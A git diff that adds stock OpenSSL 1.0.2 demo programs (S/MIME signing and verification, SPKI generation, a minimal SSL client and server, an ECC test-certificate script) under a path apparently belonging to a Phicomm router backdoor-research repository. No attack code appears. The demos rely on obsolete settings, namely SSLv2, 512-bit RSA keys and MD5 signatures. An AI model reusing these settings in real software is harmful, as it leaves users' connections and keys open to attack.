+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smsign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smsign.c
new file mode 100644
index 0000000..c7bf86d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smsign.c
@@ -0,0 +1,88 @@
+/* Simple S/MIME signing example */
+#include <openssl/pem.h>
+#include <openssl/pkcs7.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *scert = NULL;
+    EVP_PKEY *skey = NULL;
+    PKCS7 *p7 = NULL;
+    int ret = 1;
+
+    /*
+     * For simple S/MIME signing use PKCS7_DETACHED. On OpenSSL 0.9.9 only:
+     * for streaming detached set PKCS7_DETACHED|PKCS7_STREAM for streaming
+     * non-detached set PKCS7_STREAM
+     */
+    int flags = PKCS7_DETACHED | PKCS7_STREAM;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Read in signer certificate and private key */
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    scert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    skey = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    if (!scert || !skey)
+        goto err;
+
+    /* Open content being signed */
+
+    in = BIO_new_file("sign.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* Sign content */
+    p7 = PKCS7_sign(scert, skey, NULL, in, flags);
+
+    if (!p7)
+        goto err;
+
+    out = BIO_new_file("smout.txt", "w");
+    if (!out)
+        goto err;
+
+    if (!(flags & PKCS7_STREAM))
+        BIO_reset(in);
+
+    /* Write out S/MIME message */
+    if (!SMIME_write_PKCS7(out, p7, in, flags))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Signing Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (p7)
+        PKCS7_free(p7);
+    if (scert)
+        X509_free(scert);
+    if (skey)
+        EVP_PKEY_free(skey);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smsign2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smsign2.c
new file mode 100644
index 0000000..a116094
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smsign2.c
@@ -0,0 +1,102 @@
+/* S/MIME signing example: 2 signers. OpenSSL 0.9.9 only */
+#include <openssl/pem.h>
+#include <openssl/pkcs7.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL;
+    X509 *scert = NULL, *scert2 = NULL;
+    EVP_PKEY *skey = NULL, *skey2 = NULL;
+    PKCS7 *p7 = NULL;
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    tbio = BIO_new_file("signer.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    scert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    skey = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    BIO_free(tbio);
+
+    tbio = BIO_new_file("signer2.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    scert2 = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    BIO_reset(tbio);
+
+    skey2 = PEM_read_bio_PrivateKey(tbio, NULL, 0, NULL);
+
+    if (!scert2 || !skey2)
+        goto err;
+
+    in = BIO_new_file("sign.txt", "r");
+
+    if (!in)
+        goto err;
+
+    p7 = PKCS7_sign(NULL, NULL, NULL, in, PKCS7_STREAM | PKCS7_PARTIAL);
+
+    if (!p7)
+        goto err;
+
+    /* Add each signer in turn */
+
+    if (!PKCS7_sign_add_signer(p7, scert, skey, NULL, 0))
+        goto err;
+
+    if (!PKCS7_sign_add_signer(p7, scert2, skey2, NULL, 0))
+        goto err;
+
+    out = BIO_new_file("smout.txt", "w");
+    if (!out)
+        goto err;
+
+    /* NB: content included and finalized by SMIME_write_PKCS7 */
+
+    if (!SMIME_write_PKCS7(out, p7, in, PKCS7_STREAM))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Signing Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (p7)
+        PKCS7_free(p7);
+
+    if (scert)
+        X509_free(scert);
+    if (skey)
+        EVP_PKEY_free(skey);
+
+    if (scert2)
+        X509_free(scert2);
+    if (skey)
+        EVP_PKEY_free(skey2);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smver.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smver.c
new file mode 100644
index 0000000..21937df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/smime/smver.c
@@ -0,0 +1,85 @@
+/* Simple S/MIME verification example */
+#include <openssl/pem.h>
+#include <openssl/pkcs7.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL, *cont = NULL;
+    X509_STORE *st = NULL;
+    X509 *cacert = NULL;
+    PKCS7 *p7 = NULL;
+
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Set up trusted CA certificate store */
+
+    st = X509_STORE_new();
+
+    /* Read in signer certificate and private key */
+    tbio = BIO_new_file("cacert.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    cacert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    if (!cacert)
+        goto err;
+
+    if (!X509_STORE_add_cert(st, cacert))
+        goto err;
+
+    /* Open content being signed */
+
+    in = BIO_new_file("smout.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* Sign content */
+    p7 = SMIME_read_PKCS7(in, &cont);
+
+    if (!p7)
+        goto err;
+
+    /* File to output verified content to */
+    out = BIO_new_file("smver.txt", "w");
+    if (!out)
+        goto err;
+
+    if (!PKCS7_verify(p7, NULL, st, cont, out, 0)) {
+        fprintf(stderr, "Verification Failure\n");
+        goto err;
+    }
+
+    fprintf(stderr, "Verification Successful\n");
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Verifying Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (p7)
+        PKCS7_free(p7);
+
+    if (cacert)
+        X509_free(cacert);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/spkigen.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/spkigen.c
new file mode 100644
index 0000000..c272a8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/spkigen.c
@@ -0,0 +1,172 @@
+/* NOCW */
+/*-
+ * demos/spkigen.c
+ * 18-Mar-1997 - eay - A quick hack :-)
+ *              version 1.1, it would probably help to save or load the
+ *              private key :-)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/err.h>
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+/*
+ * The following two don't exist in SSLeay but they are in here as examples
+ */
+#define PEM_write_SPKI(fp,x) \
+        PEM_ASN1_write((int (*)())i2d_NETSCAPE_SPKI,"SPKI",fp,\
+                        (char *)x,NULL,NULL,0,NULL)
+int SPKI_set_pubkey(NETSCAPE_SPKI *x, EVP_PKEY *pkey);
+
+/* These are defined in the next version of SSLeay */
+int EVP_PKEY_assign(EVP_PKEY *pkey, int type, char *key);
+#define RSA_F4  0x10001
+#define EVP_PKEY_assign_RSA(pkey,rsa) EVP_PKEY_assign((pkey),EVP_PKEY_RSA,\
+                                        (char *)(rsa))
+
+int main(argc, argv)
+int argc;
+char *argv[];
+{
+    RSA *rsa = NULL;
+    NETSCAPE_SPKI *spki = NULL;
+    EVP_PKEY *pkey = NULL;
+    char buf[128];
+    int ok = 0, i;
+    FILE *fp;
+
+    pkey = EVP_PKEY_new();
+
+    if (argc < 2) {
+        /*
+         * Generate an RSA key, the random state should have been seeded with
+         * lots of calls to RAND_seed(....)
+         */
+        fprintf(stderr, "generating RSA key, could take some time...\n");
+        if ((rsa = RSA_generate_key(512, RSA_F4, NULL)) == NULL)
+            goto err;
+    } else {
+        if ((fp = fopen(argv[1], "r")) == NULL) {
+            perror(argv[1]);
+            goto err;
+        }
+        if ((rsa = PEM_read_RSAPrivateKey(fp, NULL, NULL)) == NULL)
+            goto err;
+        fclose(fp);
+    }
+
+    if (!EVP_PKEY_assign_RSA(pkey, rsa))
+        goto err;
+    rsa = NULL;
+
+    /* lets make the spki and set the public key and challenge */
+    if ((spki = NETSCAPE_SPKI_new()) == NULL)
+        goto err;
+
+    if (!SPKI_set_pubkey(spki, pkey))
+        goto err;
+
+    fprintf(stderr, "please enter challenge string:");
+    fflush(stderr);
+    buf[0] = '\0';
+    fgets(buf, sizeof buf, stdin);
+    i = strlen(buf);
+    if (i > 0)
+        buf[--i] = '\0';
+    if (!ASN1_STRING_set((ASN1_STRING *)spki->spkac->challenge, buf, i))
+        goto err;
+
+    if (!NETSCAPE_SPKI_sign(spki, pkey, EVP_md5()))
+        goto err;
+    PEM_write_SPKI(stdout, spki);
+    if (argc < 2)
+        PEM_write_RSAPrivateKey(stdout, pkey->pkey.rsa, NULL, NULL, 0, NULL);
+
+    ok = 1;
+ err:
+    if (!ok) {
+        fprintf(stderr, "something bad happened....");
+        ERR_print_errors_fp(stderr);
+    }
+    NETSCAPE_SPKI_free(spki);
+    EVP_PKEY_free(pkey);
+    exit(!ok);
+}
+
+/* This function is in the next version of SSLeay */
+int EVP_PKEY_assign(pkey, type, key)
+EVP_PKEY *pkey;
+int type;
+char *key;
+{
+    if (pkey == NULL)
+        return (0);
+    if (pkey->pkey.ptr != NULL) {
+        if (pkey->type == EVP_PKEY_RSA)
+            RSA_free(pkey->pkey.rsa);
+        /* else memory leak */
+    }
+    pkey->type = type;
+    pkey->pkey.ptr = key;
+    return (1);
+}
+
+/*
+ * While I have a X509_set_pubkey() and X509_REQ_set_pubkey(),
+ * SPKI_set_pubkey() does not currently exist so here is a version of it. The
+ * next SSLeay release will probably have X509_set_pubkey(),
+ * X509_REQ_set_pubkey() and NETSCAPE_SPKI_set_pubkey() as macros calling the
+ * same function
+ */
+int SPKI_set_pubkey(x, pkey)
+NETSCAPE_SPKI *x;
+EVP_PKEY *pkey;
+{
+    int ok = 0;
+    X509_PUBKEY *pk;
+    X509_ALGOR *a;
+    ASN1_OBJECT *o;
+    unsigned char *s, *p;
+    int i;
+
+    if (x == NULL)
+        return (0);
+
+    if ((pk = X509_PUBKEY_new()) == NULL)
+        goto err;
+    a = pk->algor;
+
+    /* set the algorithm id */
+    if ((o = OBJ_nid2obj(pkey->type)) == NULL)
+        goto err;
+    ASN1_OBJECT_free(a->algorithm);
+    a->algorithm = o;
+
+    /* Set the parameter list */
+    if ((a->parameter == NULL) || (a->parameter->type != V_ASN1_NULL)) {
+        ASN1_TYPE_free(a->parameter);
+        a->parameter = ASN1_TYPE_new();
+        a->parameter->type = V_ASN1_NULL;
+    }
+    i = i2d_PublicKey(pkey, NULL);
+    if ((s = (unsigned char *)malloc(i + 1)) == NULL)
+        goto err;
+    p = s;
+    i2d_PublicKey(pkey, &p);
+    if (!ASN1_BIT_STRING_set(pk->public_key, s, i))
+        goto err;
+    free(s);
+
+    X509_PUBKEY_free(x->spkac->pubkey);
+    x->spkac->pubkey = pk;
+    pk = NULL;
+    ok = 1;
+ err:
+    if (pk != NULL)
+        X509_PUBKEY_free(pk);
+    return (ok);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/cli.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/cli.cpp
new file mode 100644
index 0000000..49cba5d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/cli.cpp
@@ -0,0 +1,110 @@
+/* cli.cpp  -  Minimal ssleay client for Unix
+   30.9.1996, Sampo Kellomaki <sampo@iki.fi> */
+
+/* mangled to work with SSLeay-0.9.0b and OpenSSL 0.9.2b
+   Simplified to be even more minimal
+   12/98 - 4/99 Wade Scholine <wades@mail.cybg.com> */
+
+#include <stdio.h>
+#include <memory.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+
+#include <openssl/crypto.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+
+
+#define CHK_NULL(x) if ((x)==NULL) exit (1)
+#define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }
+#define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); }
+
+void main ()
+{
+  int err;
+  int sd;
+  struct sockaddr_in sa;
+  SSL_CTX* ctx;
+  SSL*     ssl;
+  X509*    server_cert;
+  char*    str;
+  char     buf [4096];
+  SSL_METHOD *meth;
+
+  SSLeay_add_ssl_algorithms();
+  meth = SSLv2_client_method();
+  SSL_load_error_strings();
+  ctx = SSL_CTX_new (meth);                        CHK_NULL(ctx);
+
+  CHK_SSL(err);
+  
+  /* ----------------------------------------------- */
+  /* Create a socket and connect to server using normal socket calls. */
+  
+  sd = socket (AF_INET, SOCK_STREAM, 0);       CHK_ERR(sd, "socket");
+ 
+  memset (&sa, '\0', sizeof(sa));
+  sa.sin_family      = AF_INET;
+  sa.sin_addr.s_addr = inet_addr ("127.0.0.1");   /* Server IP */
+  sa.sin_port        = htons     (1111);          /* Server Port number */
+  
+  err = connect(sd, (struct sockaddr*) &sa,
+		sizeof(sa));                   CHK_ERR(err, "connect");
+
+  /* ----------------------------------------------- */
+  /* Now we have TCP conncetion. Start SSL negotiation. */
+  
+  ssl = SSL_new (ctx);                         CHK_NULL(ssl);    
+  SSL_set_fd (ssl, sd);
+  err = SSL_connect (ssl);                     CHK_SSL(err);
+    
+  /* Following two steps are optional and not required for
+     data exchange to be successful. */
+  
+  /* Get the cipher - opt */
+
+  printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
+  
+  /* Get server's certificate (note: beware of dynamic allocation) - opt */
+
+  server_cert = SSL_get_peer_certificate (ssl);       CHK_NULL(server_cert);
+  printf ("Server certificate:\n");
+  
+  str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0);
+  CHK_NULL(str);
+  printf ("\t subject: %s\n", str);
+  OPENSSL_free (str);
+
+  str = X509_NAME_oneline (X509_get_issuer_name  (server_cert),0,0);
+  CHK_NULL(str);
+  printf ("\t issuer: %s\n", str);
+  OPENSSL_free (str);
+
+  /* We could do all sorts of certificate verification stuff here before
+     deallocating the certificate. */
+
+  X509_free (server_cert);
+  
+  /* --------------------------------------------------- */
+  /* DATA EXCHANGE - Send a message and receive a reply. */
+
+  err = SSL_write (ssl, "Hello World!", strlen("Hello World!"));  CHK_SSL(err);
+  
+  err = SSL_read (ssl, buf, sizeof(buf) - 1);                     CHK_SSL(err);
+  buf[err] = '\0';
+  printf ("Got %d chars:'%s'\n", err, buf);
+  SSL_shutdown (ssl);  /* send SSL/TLS close_notify */
+
+  /* Clean up. */
+
+  close (sd);
+  SSL_free (ssl);
+  SSL_CTX_free (ctx);
+}
+/* EOF - cli.cpp */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/inetdsrv.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/inetdsrv.cpp
new file mode 100644
index 0000000..efd70d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/inetdsrv.cpp
@@ -0,0 +1,98 @@
+/* inetdserv.cpp  -  Minimal ssleay server for Unix inetd.conf
+ * 30.9.1996, Sampo Kellomaki <sampo@iki.fi>
+ * From /etc/inetd.conf:
+ *     1111 stream tcp nowait sampo /usr/users/sampo/demo/inetdserv inetdserv
+ */
+
+#include <stdio.h>
+#include <errno.h>
+
+#include "rsa.h"       /* SSLeay stuff */
+#include <openssl/crypto.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+
+#define HOME "/usr/users/sampo/demo/"
+#define CERTF HOME "plain-cert.pem"
+#define KEYF  HOME "plain-key.pem"
+
+#define CHK_NULL(x) if ((x)==NULL) exit (1)
+#define CHK_ERR(err,s) if ((err)==-1) \
+                         { fprintf(log, "%s %d\n", (s), errno); exit(1); }
+#define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(log); exit(2); }
+
+void main ()
+{
+  int err;
+  SSL_CTX* ctx;
+  SSL*     ssl;
+  X509*    client_cert;
+  char*    str;
+  char     buf [4096];
+  FILE* log;
+  
+  log = fopen ("/dev/console", "a");                     CHK_NULL(log);
+  fprintf (log, "inetdserv %ld\n", (long)getpid());
+  
+  SSL_load_error_strings();
+  ctx = SSL_CTX_new (); CHK_NULL(ctx);
+  
+  err = SSL_CTX_use_RSAPrivateKey_file (ctx, KEYF,  SSL_FILETYPE_PEM);
+  CHK_SSL (err);
+  
+  err = SSL_CTX_use_certificate_file   (ctx, CERTF, SSL_FILETYPE_PEM);
+  CHK_SSL (err);
+
+  /* inetd has already opened the TCP connection, so we can get right
+     down to business. */
+  
+  ssl = SSL_new (ctx);  CHK_NULL(ssl);
+  SSL_set_fd (ssl,  fileno(stdin));
+  err = SSL_accept (ssl);                                CHK_SSL(err);
+  
+  /* Get the cipher - opt */
+  
+  fprintf (log, "SSL connection using %s\n", SSL_get_cipher (ssl));
+  
+  /* Get client's certificate (note: beware of dynamic allocation) - opt */
+
+  client_cert = SSL_get_peer_certificate (ssl);
+  if (client_cert != NULL) {
+    fprintf (log, "Client certificate:\n");
+    
+    str = X509_NAME_oneline (X509_get_subject_name (client_cert));
+    CHK_NULL(str);
+    fprintf (log, "\t subject: %s\n", str);
+    OPENSSL_free (str);
+    
+    str = X509_NAME_oneline (X509_get_issuer_name  (client_cert));
+    CHK_NULL(str);
+    fprintf (log, "\t issuer: %s\n", str);
+    OPENSSL_free (str);
+    
+    /* We could do all sorts of certificate verification stuff here before
+       deallocating the certificate. */
+    
+    X509_free (client_cert);
+  } else
+    fprintf (log, "Client doe not have certificate.\n");
+
+  /* ------------------------------------------------- */
+  /* DATA EXCHANGE: Receive message and send reply  */
+  
+  err = SSL_read (ssl, buf, sizeof(buf) - 1);  CHK_SSL(err);
+  buf[err] = '\0';
+  fprintf (log, "Got %d chars:'%s'\n", err, buf);
+  
+  err = SSL_write (ssl, "Loud and clear.", strlen("Loud and clear."));
+  CHK_SSL(err);
+
+  /* Clean up. */
+
+  fclose (log);
+  SSL_free (ssl);
+  SSL_CTX_free (ctx);
+}
+/* EOF - inetdserv.cpp */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/serv.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/serv.cpp
new file mode 100644
index 0000000..b142c75
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssl/serv.cpp
@@ -0,0 +1,152 @@
+/* serv.cpp  -  Minimal ssleay server for Unix
+   30.9.1996, Sampo Kellomaki <sampo@iki.fi> */
+
+
+/* mangled to work with SSLeay-0.9.0b and OpenSSL 0.9.2b
+   Simplified to be even more minimal
+   12/98 - 4/99 Wade Scholine <wades@mail.cybg.com> */
+
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <memory.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+
+#include <openssl/rsa.h>       /* SSLeay stuff */
+#include <openssl/crypto.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+
+
+/* define HOME to be dir for key and cert files... */
+#define HOME "./"
+/* Make these what you want for cert & key files */
+#define CERTF  HOME "foo-cert.pem"
+#define KEYF  HOME  "foo-cert.pem"
+
+
+#define CHK_NULL(x) if ((x)==NULL) exit (1)
+#define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }
+#define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); }
+
+void main ()
+{
+  int err;
+  int listen_sd;
+  int sd;
+  struct sockaddr_in sa_serv;
+  struct sockaddr_in sa_cli;
+  size_t client_len;
+  SSL_CTX* ctx;
+  SSL*     ssl;
+  X509*    client_cert;
+  char*    str;
+  char     buf [4096];
+  SSL_METHOD *meth;
+  
+  /* SSL preliminaries. We keep the certificate and key with the context. */
+
+  SSL_load_error_strings();
+  SSLeay_add_ssl_algorithms();
+  meth = SSLv23_server_method();
+  ctx = SSL_CTX_new (meth);
+  if (!ctx) {
+    ERR_print_errors_fp(stderr);
+    exit(2);
+  }
+  
+  if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    exit(3);
+  }
+  if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    exit(4);
+  }
+
+  if (!SSL_CTX_check_private_key(ctx)) {
+    fprintf(stderr,"Private key does not match the certificate public key\n");
+    exit(5);
+  }
+
+  /* ----------------------------------------------- */
+  /* Prepare TCP socket for receiving connections */
+
+  listen_sd = socket (AF_INET, SOCK_STREAM, 0);   CHK_ERR(listen_sd, "socket");
+  
+  memset (&sa_serv, '\0', sizeof(sa_serv));
+  sa_serv.sin_family      = AF_INET;
+  sa_serv.sin_addr.s_addr = INADDR_ANY;
+  sa_serv.sin_port        = htons (1111);          /* Server Port number */
+  
+  err = bind(listen_sd, (struct sockaddr*) &sa_serv,
+	     sizeof (sa_serv));                   CHK_ERR(err, "bind");
+	     
+  /* Receive a TCP connection. */
+	     
+  err = listen (listen_sd, 5);                    CHK_ERR(err, "listen");
+  
+  client_len = sizeof(sa_cli);
+  sd = accept (listen_sd, (struct sockaddr*) &sa_cli, &client_len);
+  CHK_ERR(sd, "accept");
+  close (listen_sd);
+
+  printf ("Connection from %lx, port %x\n",
+	  sa_cli.sin_addr.s_addr, sa_cli.sin_port);
+  
+  /* ----------------------------------------------- */
+  /* TCP connection is ready. Do server side SSL. */
+
+  ssl = SSL_new (ctx);                           CHK_NULL(ssl);
+  SSL_set_fd (ssl, sd);
+  err = SSL_accept (ssl);                        CHK_SSL(err);
+  
+  /* Get the cipher - opt */
+  
+  printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
+  
+  /* Get client's certificate (note: beware of dynamic allocation) - opt */
+
+  client_cert = SSL_get_peer_certificate (ssl);
+  if (client_cert != NULL) {
+    printf ("Client certificate:\n");
+    
+    str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0);
+    CHK_NULL(str);
+    printf ("\t subject: %s\n", str);
+    OPENSSL_free (str);
+    
+    str = X509_NAME_oneline (X509_get_issuer_name  (client_cert), 0, 0);
+    CHK_NULL(str);
+    printf ("\t issuer: %s\n", str);
+    OPENSSL_free (str);
+    
+    /* We could do all sorts of certificate verification stuff here before
+       deallocating the certificate. */
+    
+    X509_free (client_cert);
+  } else
+    printf ("Client does not have certificate.\n");
+
+  /* DATA EXCHANGE - Receive message and send reply. */
+
+  err = SSL_read (ssl, buf, sizeof(buf) - 1);                   CHK_SSL(err);
+  buf[err] = '\0';
+  printf ("Got %d chars:'%s'\n", err, buf);
+  
+  err = SSL_write (ssl, "I hear you.", strlen("I hear you."));  CHK_SSL(err);
+
+  /* Clean up. */
+
+  close (sd);
+  SSL_free (ssl);
+  SSL_CTX_free (ctx);
+}
+/* EOF - serv.cpp */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ECC-RSAcertgen.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ECC-RSAcertgen.sh
new file mode 100755
index 0000000..b31a4f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/ssltest-ecc/ECC-RSAcertgen.sh
@@ -0,0 +1,98 @@
+#!/bin/sh
+
+# For a list of supported curves, use "apps/openssl ecparam -list_curves".
+
+# Path to the openssl distribution
+OPENSSL_DIR=../..
+# Path to the openssl program
+OPENSSL_CMD=$OPENSSL_DIR/apps/openssl
+# Option to find configuration file
+OPENSSL_CNF="-config $OPENSSL_DIR/apps/openssl.cnf"
+# Directory where certificates are stored
+CERTS_DIR=./Certs
+# Directory where private key files are stored
+KEYS_DIR=$CERTS_DIR
+# Directory where combo files (containing a certificate and corresponding
+# private key together) are stored
+COMBO_DIR=$CERTS_DIR
+# cat command
+CAT=/bin/cat
+# rm command
+RM=/bin/rm
+# mkdir command
+MKDIR=/bin/mkdir
+# The certificate will expire these many days after the issue date.
+DAYS=1500
+TEST_CA_FILE=rsa1024TestCA
+
+TEST_SERVER_CURVE=sect163r1
+TEST_SERVER_FILE=sect163r1-rsaTestServer
+TEST_SERVER_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test Server (sect163r1 key signed with RSA)"
+
+TEST_CLIENT_CURVE=sect163r1
+TEST_CLIENT_FILE=sect163r1-rsaTestClient
+TEST_CLIENT_DN="/C=US/ST=CA/L=Mountain View/O=Sun Microsystems, Inc./OU=Sun Microsystems Laboratories/CN=Test Client (sect163r1 key signed with RSA)"
+
+# Generating an EC certificate involves the following main steps
+# 1. Generating curve parameters (if needed)
+# 2. Generating a certificate request
+# 3. Signing the certificate request 
+# 4. [Optional] One can combine the cert and private key into a single
+#    file and also delete the certificate request
+
+$MKDIR -p $CERTS_DIR
+$MKDIR -p $KEYS_DIR
+$MKDIR -p $COMBO_DIR
+
+echo "GENERATING A TEST SERVER CERTIFICATE (ECC key signed with RSA)"
+echo "=============================================================="
+$OPENSSL_CMD ecparam -name $TEST_SERVER_CURVE -out $TEST_SERVER_CURVE.pem
+
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_SERVER_DN" \
+    -keyout $KEYS_DIR/$TEST_SERVER_FILE.key.pem \
+    -newkey ec:$TEST_SERVER_CURVE.pem -new \
+    -out $CERTS_DIR/$TEST_SERVER_FILE.req.pem
+
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_SERVER_FILE.req.pem \
+    -CA $CERTS_DIR/$TEST_CA_FILE.cert.pem \
+    -CAkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -CAcreateserial
+
+# Display the certificate 
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_SERVER_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_SERVER_FILE.pem
+$CAT $KEYS_DIR/$TEST_SERVER_FILE.key.pem >> $COMBO_DIR/$TEST_SERVER_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_SERVER_FILE.req.pem
+
+echo "GENERATING A TEST CLIENT CERTIFICATE (ECC key signed with RSA)"
+echo "=============================================================="
+$OPENSSL_CMD ecparam -name $TEST_CLIENT_CURVE -out $TEST_CLIENT_CURVE.pem
+
+$OPENSSL_CMD req $OPENSSL_CNF -nodes -subj "$TEST_CLIENT_DN" \
+	     -keyout $KEYS_DIR/$TEST_CLIENT_FILE.key.pem \
+	     -newkey ec:$TEST_CLIENT_CURVE.pem -new \
+	     -out $CERTS_DIR/$TEST_CLIENT_FILE.req.pem
+
+$OPENSSL_CMD x509 -req -days $DAYS \
+    -in $CERTS_DIR/$TEST_CLIENT_FILE.req.pem \
+    -CA $CERTS_DIR/$TEST_CA_FILE.cert.pem \
+    -CAkey $KEYS_DIR/$TEST_CA_FILE.key.pem \
+    -out $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -CAcreateserial
+
+# Display the certificate 
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -text
+
+# Place the certificate and key in a common file
+$OPENSSL_CMD x509 -in $CERTS_DIR/$TEST_CLIENT_FILE.cert.pem -issuer -subject \
+	 > $COMBO_DIR/$TEST_CLIENT_FILE.pem
+$CAT $KEYS_DIR/$TEST_CLIENT_FILE.key.pem >> $COMBO_DIR/$TEST_CLIENT_FILE.pem
+
+# Remove the cert request file (no longer needed)
+$RM $CERTS_DIR/$TEST_CLIENT_FILE.req.pem
+
